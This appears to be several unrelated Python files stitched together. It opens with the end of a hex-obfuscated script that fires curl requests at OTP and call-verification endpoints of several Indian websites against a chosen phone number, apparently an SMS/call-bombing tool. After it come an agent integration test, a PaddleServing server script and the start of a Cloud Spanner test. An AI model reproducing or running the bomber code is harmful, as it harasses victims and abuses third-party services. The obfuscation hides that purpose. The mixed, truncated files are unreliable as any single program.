6b\x69\x65\x3a\x68\x69\x6e\x74\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x33\x36\x39\x38\x31\x39\x32\x37\x36\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x36\x36\x35\x36\x38\x38\x37\x35\x33\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x64\x54\x64\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x3d\x67\x6f\x6f\x67\x6c\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x48\x49\x44\x45\x5f\x4f\x4e\x42\x4f\x41\x52\x44\x49\x4e\x47\x5f\x4c\x4f\x43\x41\x54\x49\x4f\x4e\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x3d\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x61\x6b\x5f\x62\x6d\x73\x63\x3d\x33\x30\x37\x43\x35\x33\x31\x31\x46\x42\x30\x30\x41\x33\x46\x34\x45\x38\x35\x36\x41\x46\x46\x45\x31\x41\x39\x44\x30\x30\x30\x42\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x45\x38\x30\x32\x30\x36\x37\x7e\x70\x6c\x46\x5a\x66\x62\x4d\x51\x47\x67\x45\x44\x72\x37\x4f\x57\x56\x65\x39\x46\x76\x71\x66\x54\x32\x34\x5a\x74\x4f\x56\x4d\x61\x6d\x74\x59\x63\x61\x69\x70\x37\x31\x49\x59\x4f\x72\x76\x32\x2b\x53\x51\x36\x66\x6f\x6b\x53\x76\x4d\x6b\x32\x55\x65\x73\x7a\x35\x76\x31\x73\x46\x66\x61\x69\x63\x68\x62\x74\x44\x67\x65\x56\x53\x6a\x33\x74\x65\x33\x76\x58\x4a\x4b\x65\x7a\x53\x57\x67\x76\x6f\x56\x57\x72\x4b\x37\x67\x66\x7a\x46\x72\x4c\x7a\x31\x72\x75\x42\x6d\x30\x4d\x51\x6a\x30\x31\x56\x35\x43\x6d\x70\x61\x54\x72\x36\x74\x52\x67\x44\x52\x53\x4e\x36\x62\x6b\x73\x33\x6e\x71\x76\x4f\x48\x7a\x52\x30\x74\x41\x31\x49\x6f\x71\x66\x44\x66\x71\x32\x4d\x4b\x74\x6d\x44\x6a\x62\x6b\x6e\x43\x49\x35\x46\x6c\x4c\x59\x55\x54\x77\x71\x6c\x6e\x77\x48\x6f\x77\x59\x41\x72\x66\x79\x62\x6e\x32\x6e\x33\x79\x69\x6c\x45\x36\x56\x4b\x48\x6a\x57\x2b\x74\x48\x38\x6b\x71\x6a\x41\x66\x48\x38\x42\x47\x75\x69\x6a\x70\x6d\x4f\x39\x70\x4e\x6b\x67\x6d\x49\x79\x4f\x65\x61\x5a\x49\x56\x4d\x33\x6b\x36\x46\x47\x4f\x4c\x33\x57\x6a\x33\x6a\x4c\x49\x38\x75\x47\x61\x55\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x61\x62\x63\x6b\x3d\x31\x35\x33\x42\x44\x33\x44\x33\x33\x33\x39\x34\x38\x41\x35\x38\x39\x33\x32\x37\x34\x38\x43\x41\x43\x33\x44\x34\x43\x33\x46\x34\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x38\x38\x33\x38\x45\x30\x35\x7e\x30\x7e\x38\x4f\x2b\x75\x64\x78\x64\x47\x33\x38\x73\x42\x46\x54\x50\x5a\x70\x61\x42\x4c\x34\x49\x47\x6a\x37\x65\x55\x63\x4b\x4a\x31\x56\x77\x41\x74\x4a\x35\x32\x47\x4d\x4f\x35\x45\x3d\x7e\x2d\x31\x7e\x2d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x7a\x3d\x42\x44\x36\x36\x35\x44\x39\x31\x39\x46\x37\x43\x36\x46\x41\x38\x33\x37\x34\x46\x31\x39\x36\x34\x34\x35\x35\x39\x36\x34\x33\x36\x7e\x59\x41\x41\x51\x32\x62\x34\x55\x41\x72\x70\x4f\x41\x77\x74\x72\x41\x51\x41\x41\x71\x30\x71\x50\x47\x77\x4e\x6b\x73\x48\x42\x67\x70\x68\x4c\x77\x44\x7a\x77\x66\x42\x6c\x77\x49\x52\x51\x4a\x41\x47\x37\x74\x78\x6d\x6a\x42\x6f\x2f\x6f\x66\x37\x4e\x69\x41\x4a\x39\x33\x67\x79\x2f\x37\x76\x42\x68\x51\x39\x6c\x35\x73\x49\x4b\x64\x77\x74\x6c\x32\x6a\x2b\x55\x34\x62\x79\x73\x32\x48\x68\x68\x35\x74\x5a\x6c\x5a\x4c\x2f\x6a\x71\x64\x6e\x57\x2f\x4a\x72\x67\x6d\x67\x61\x77\x63\x78\x69\x75\x6e\x41\x4a\x33\x32\x42\x62\x59\x39\x55\x74\x6e\x46\x49\x72\x4e\x78\x62\x62\x52\x76\x7a\x51\x43\x59\x6e\x53\x77\x66\x2f\x63\x7a\x39\x61\x37\x6a\x55\x52\x73\x75\x69\x37\x6c\x65\x75\x4c\x61\x56\x6d\x37\x6d\x51\x45\x63\x48\x50\x4f\x74\x43\x36\x67\x35\x6a\x72\x54\x6f\x41\x4d\x54\x62\x64\x41\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x39\x37\x63\x30\x39\x65\x32\x61\x61\x62\x64\x66\x65\x64\x38\x39\x62\x38\x37\x61\x33\x30\x31\x30\x64\x37\x66\x31\x33\x63\x36\x34\x3d\x33\x35\x33\x62\x34\x66\x39\x66\x64\x38\x32\x64\x32\x36\x32\x36\x38\x61\x64\x31\x31\x62\x32\x63\x31\x65\x39\x61\x65\x30\x31\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x71\x73\x74\x61\x74\x75\x73\x3d\x31\x35\x35\x39\x35\x33\x36\x37\x30\x34\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x61\x71\x75\x65\x73\x69\x73\x3d\x70\x61\x6e\x2d\x32\x36\x33\x38\x31\x40\x61\x23\x70\x61\x6e\x2d\x32\x37\x37\x35\x32\x40\x62\x23\x70\x61\x6e\x2d\x33\x30\x30\x34\x33\x40\x62\x23\x70\x61\x6e\x61\x2d\x32\x36\x33\x38\x31\x40\x62\x22\x20\x2d\x64\x20\x5c\x27\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x63\x61\x6c\x6c\x22\x2c\x22\x64\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x22\x3a\x22\x2b\x39\x31\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x7d\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x73\x22\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x69\x6d\x61\x67\x65\x2f\x61\x70\x6e\x67\x2c\x69\x6d\x61\x67\x65\x2f\x2a\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x2f\x62\x72\x69\x63\x6b\x73\x2f\x76\x65\x72\x69\x66\x79\x4f\x6e\x43\x61\x6c\x6c\x2e\x68\x74\x6d\x6c\x3f\x6d\x6f\x62\x69\x6c\x65\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x2e\x64\x65\x63\x6f\x64\x65\x28\x27\x75\x74\x66\x2d\x38\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x73\x74\x72\x69\x70\x28\x29\x2e\x66\x69\x6e\x64\x28\x27\x63\x61\x6c\x6c\x6d\x61\x64\x65\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x79\x75\x70\x63\x68\x61\x72\x2e\x63\x6f\x6d\x2f\x75\x73\x65\x72\x5f\x70\x72\x6f\x66\x69\x6c\x65\x2f\x72\x65\x73\x65\x6e\x64\x5f\x6f\x74\x70\x5f\x76\x69\x61\x5f\x76\x6f\x69\x63\x65\x3f\x69\x64\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x31\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65
'''
file2.writelines(L)
file2.close()
if __name__=='__main__':
verCheck()
p1 = Process(target = magic())
p1.start()
p2 = Process(target = loadingHack())
p2.start()
print("\n")
#
|
test_weather_ledger.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains the integration test for the weather skills."""
import os
import pytest
import shutil
import signal
import subprocess
import sys
import tempfile
import time
import io
import threading
from ...common.click_testing import CliRunner
from aea.cli import cli
from tests.conftest import CLI_LOG_OPTION
def _read_tty(pid: subprocess.Popen):
for line in io.TextIOWrapper(pid.stdout, encoding="utf-8"):
print("stdout: " + line.replace("\n", ""))
def _read_error(pid: subprocess.Popen):
for line in io.TextIOWrapper(pid.stderr, encoding="utf-8"):
print("stderr: " + line.replace("\n", ""))
class TestWeatherSkillsFetchaiLedger:
"""Test that weather skills work."""
@pytest.fixture(autouse=True)
def _start_oef_node(self, network_node):
"""Start an oef node."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name_one = "my_weather_station"
cls.agent_name_two = "my_weather_client"
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
def test_weather(self, pytestconfig):
"""Run the weather skills sequence."""
if pytestconfig.getoption("ci"):
pytest.skip("Skipping the test since it doesn't work in CI.")
# add packages folder
packages_src = os.path.join(self.cwd, 'packages')
packages_dst = os.path.join(os.getcwd(), 'packages')
shutil.copytree(packages_src, packages_dst)
# Add scripts folder
scripts_src = os.path.join(self.cwd, 'scripts')
scripts_dst = os.path.join(os.getcwd(), 'scripts')
shutil.copytree(scripts_src, scripts_dst)
# create agent one and agent two
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "create", self.agent_name_one], standalone_mode=False)
assert result.exit_code == 0
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "create", self.agent_name_two], standalone_mode=False)
assert result.exit_code == 0
# add packages for agent one and run it
agent_one_dir_path = os.path.join(self.t, self.agent_name_one)
os.chdir(agent_one_dir_path)
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "add", "skill", "weather_station_ledger"], standalone_mode=False)
assert result.exit_code == 0
process_one = subprocess.Popen([
sys.executable,
'-m',
'aea.cli',
"run"
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=os.environ.copy())
os.chdir(self.t)
# add packages for agent two and run it
agent_two_dir_path = os.path.join(self.t, self.agent_name_two)
os.chdir(agent_two_dir_path)
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "add", "skill", "weather_client_ledger"], standalone_mode=False)
assert result.exit_code == 0
# Load the agent yaml file and manually insert the things we need
file = open("aea-config.yaml", mode='r')
# read all lines at once
whole_file = file.read()
# add in the ledger address
find_text = "ledger_apis: []"
replace_text = """ledger_apis:
- ledger_api:
addr: alpha.fetch-ai.com
ledger: fetchai
port: 80"""
whole_file = whole_file.replace(find_text, replace_text)
# close the file
file.close()
with open("aea-config.yaml", 'w') as f:
f.write(whole_file)
# Generate the private keys
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "generate-key", "fetchai"], standalone_mode=False)
assert result.exit_code == 0
# Add some funds to the weather station
os.chdir(os.path.join(scripts_dst, "../"))
result = subprocess.call(["python", "./scripts/fetchai_wealth_generation.py", "--private-key", os.path.join("./", self.agent_name_two, "fet_private_key.txt"), "--amount", "10000000", "--addr", "alpha.fetch-ai.com", "--port", "80"])
assert result == 0
os.chdir(agent_two_dir_path)
process_two = subprocess.Popen([
sys.executable,
'-m',
'aea.cli',
"run"
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=os.environ.copy())
tty_read_thread = threading.Thread(target=_read_tty, args=(process_one, ))
tty_read_thread.start()
error_read_thread = threading.Thread(target=_read_error, args=(process_one, ))
error_read_thread.start()
tty_read_thread = threading.Thread(target=_read_tty, args=(process_two, ))
tty_read_thread.start()
error_read_thread = threading.Thread(target=_read_error, args=(process_two, ))
error_read_thread.start()
time.sleep(60)
process_one.send_signal(signal.SIGINT)
process_two.send_signal(signal.SIGINT)
process_one.wait(timeout=60)
process_two.wait(timeout=60)
# text1, err1 = process_one.communicate()
# text2, err2 = process_two.communicate()
assert process_one.returncode == 0
assert process_two.returncode == 0
poll_one = process_one.poll()
if poll_one is None:
process_one.terminate()
process_one.wait(2)
poll_two = process_two.poll()
if poll_two is None:
process_two.terminate()
process_two.wait(2)
os.chdir(self.t)
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "delete", self.agent_name_one], standalone_mode=False)
assert result.exit_code == 0
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "delete", self.agent_name_two], standalone_mode=False)
assert result.exit_code == 0
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
|
serve.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with one line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
from contextlib import closing
import socket
from paddle_serving_server.env import CONF_HOME
import signal
from paddle_serving_server.util import *
# web_service.py is still used by Pipeline.
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('127.0.0.1', port))
if result != 0:
return True
else:
return False
def format_gpu_to_strlist(unformatted_gpus):
gpus_strlist = []
if isinstance(unformatted_gpus, int):
gpus_strlist = [str(unformatted_gpus)]
elif isinstance(unformatted_gpus, list):
if unformatted_gpus == [""]:
gpus_strlist = ["-1"]
elif len(unformatted_gpus) == 0:
gpus_strlist = ["-1"]
else:
gpus_strlist = [str(x) for x in unformatted_gpus]
elif isinstance(unformatted_gpus, str):
if unformatted_gpus == "":
gpus_strlist = ["-1"]
else:
gpus_strlist = [unformatted_gpus]
elif unformatted_gpus == None:
gpus_strlist = ["-1"]
else:
raise ValueError("error input of set_gpus")
# check cuda visible
if "CUDA_VISIBLE_DEVICES" in os.environ:
env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
# op_gpu_list == ["-1"] means this op use CPU
# so don`t check cudavisible.
if op_gpu_list == ["-1"]:
continue
for ids in op_gpu_list:
if ids not in env_gpus:
print("gpu_ids is not in CUDA_VISIBLE_DEVICES.")
exit(-1)
# check gpuid is valid
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
use_gpu = False
for ids in op_gpu_list:
if int(ids) < -1:
raise ValueError("The input of gpuid error.")
if int(ids) >= 0:
use_gpu = True
if int(ids) == -1 and use_gpu:
raise ValueError("You can not use CPU and GPU in one model.")
return gpus_strlist
def is_gpu_mode(unformatted_gpus):
gpus_strlist = format_gpu_to_strlist(unformatted_gpus)
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
for ids in op_gpu_list:
if int(ids) >= 0:
return True
return False
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument("server", type=str, default="start",nargs="?", help="stop or start PaddleServing")
parser.add_argument(
"--thread",
type=int,
default=4,
help="Concurrency of server,[4,1024]",
choices=range(4, 1025))
parser.add_argument(
"--port", type=int, default=9393, help="Port of the starting gpu")
parser.add_argument(
"--device", type=str, default="cpu", help="Type of device")
parser.add_argument(
"--gpu_ids", type=str, default="", nargs="+", help="gpu ids")
parser.add_argument(
"--op_num", type=int, default=0, nargs="+", help="Number of each op")
parser.add_argument(
"--op_max_batch",
type=int,
default=32,
nargs="+",
help="Max batch of each op")
parser.add_argument(
"--model", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--use_mkl", default=False, action="store_true", help="Use MKL")
parser.add_argument(
"--precision",
type=str,
default="fp32",
help="precision mode(fp32, int8, fp16, bf16)")
parser.add_argument(
"--use_calib",
default=False,
action="store_true",
help="Use TensorRT Calibration")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_encryption_model",
default=False,
action="store_true",
help="Use encryption model")
parser.add_argument(
"--use_trt", default=False, action="store_true", help="Use TensorRT")
parser.add_argument(
"--use_lite", default=False, action="store_true", help="Use PaddleLite")
parser.add_argument(
"--use_xpu", default=False, action="store_true", help="Use XPU")
parser.add_argument(
"--product_name",
type=str,
default=None,
help="product_name for authentication")
parser.add_argument(
"--container_id",
type=str,
default=None,
help="container_id for authentication")
parser.add_argument(
"--gpu_multi_stream",
default=False,
action="store_true",
help="Use gpu_multi_stream")
return parser.parse_args()
def start_gpu_card_model(gpu_mode, port, args): # pylint: disable=doc-string-missing
device = "cpu"
if gpu_mode == True:
device = "gpu"
thread_num = args.thread
model = args.model
mem_optim = args.mem_optim_off is False
ir_optim = args.ir_optim
use_mkl = args.use_mkl
max_body_size = args.max_body_size
workdir = "{}_{}".format(args.workdir, port)
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(model):
infer_op_name = "general_infer"
# 目前由于ocr的节点Det模型依赖于opencv的第三方库
# 只有使用ocr的时候,才会加入opencv的第三方库并编译GeneralDetectionOp
# 故此处做特殊处理,当不满足下述情况时,所添加的op默认为GeneralInferOp
# 以后可能考虑不用python脚本来生成配置
if len(model) == 2 and idx == 0 and single_model == "ocr_det_model":
infer_op_name = "general_detection"
else:
infer_op_name = "general_infer"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
server = serving.Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.use_mkl(use_mkl)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_max_body_size(max_body_size)
if args.use_trt and device == "gpu":
server.set_trt()
server.set_ir_optimize(True)
if args.gpu_multi_stream and device == "gpu":
server.set_gpu_multi_stream()
if args.op_num:
server.set_op_num(args.op_num)
if args.op_max_batch:
server.set_op_max_batch(args.op_max_batch)
if args.use_lite:
server.set_lite()
server.set_device(device)
if args.use_xpu:
server.set_xpu()
if args.product_name != None:
server.set_product_name(args.product_name)
if args.container_id != None:
server.set_container_id(args.container_id)
if gpu_mode == True:
server.set_gpuid(args.gpu_ids)
server.load_model_config(model)
server.prepare_server(
workdir=workdir,
port=port,
device=device,
use_encryption_model=args.use_encryption_model)
server.run_server()
def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing
if serving_port == None:
serving_port = args.port
if args.use_lite:
print("run using paddle-lite.")
start_gpu_card_model(False, serving_port, args)
else:
start_gpu_card_model(is_gpu_mode(args.gpu_ids), serving_port, args)
class MainService(BaseHTTPRequestHandler):
def get_available_port(self):
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
return default_port + i
def start_serving(self):
start_multi_card(args, serving_port)
def get_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "wb") as f:
f.write(key)
return True
def check_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "rb") as f:
cur_key = f.read()
if key != cur_key:
return False
return True
def start(self, post_data):
post_data = json.loads(post_data.decode('utf-8'))
global p_flag
if not p_flag:
if args.use_encryption_model:
print("waiting key for model")
if not self.get_key(post_data):
print("not found key in request")
return False
global serving_port
global p
serving_port = self.get_available_port()
p = Process(target=self.start_serving)
p.start()
time.sleep(3)
if p.is_alive():
p_flag = True
else:
return False
else:
if p.is_alive():
if not self.check_key(post_data):
return False
else:
return False
return True
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if self.start(post_data):
response = {"endpoint_list": [serving_port]}
else:
response = {"message": "start serving failed"}
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(response).encode())
def stop_serving(command : str, port : int = None):
'''
Stop PaddleServing by port.
Args:
command(str): stop->SIGINT, kill->SIGKILL
port(int): Default to None, kill all processes in ProcessInfo.json.
Not None, kill the specific process relating to port
Returns:
True if stop serving successfully.
False if error occured
Examples:
.. code-block:: python
stop_serving("stop", 9494)
'''
filepath = os.path.join(CONF_HOME, "ProcessInfo.json")
infoList = load_pid_file(filepath)
if infoList is False:
return False
lastInfo = infoList[-1]
for info in infoList:
storedPort = info["port"]
pid = info["pid"]
model = info["model"]
start_time = info["start_time"]
if port is not None:
if port in storedPort:
kill_stop_process_by_pid(command ,pid)
infoList.remove(info)
if len(infoList):
with open(filepath, "w") as fp:
json.dump(infoList, fp)
else:
os.remove(filepath)
return True
else:
if lastInfo == info:
raise ValueError(
"Please confirm the port [%s] you specified is correct." %
port)
else:
pass
else:
kill_stop_process_by_pid(command ,pid)
if lastInfo == info:
os.remove(filepath)
return True
if __name__ == "__main__":
# args.device is not used at all.
# just keep the interface.
# so --device should not be recommended at the HomePage.
args = serve_args()
if args.server == "stop" or args.server == "kill":
result = 0
if "--port" in sys.argv:
result = stop_serving(args.server, args.port)
else:
result = stop_serving(args.server)
if result == 0:
os._exit(0)
else:
os._exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
if port_is_available(args.port):
portList = [args.port]
dump_pid_file(portList, args.model)
if args.use_encryption_model:
p_flag = False
p = None
serving_port = 0
server = HTTPServer(('0.0.0.0', int(args.port)), MainService)
print(
'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
)
server.serve_forever()
else:
start_multi_card(args)
|
test_system.py | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
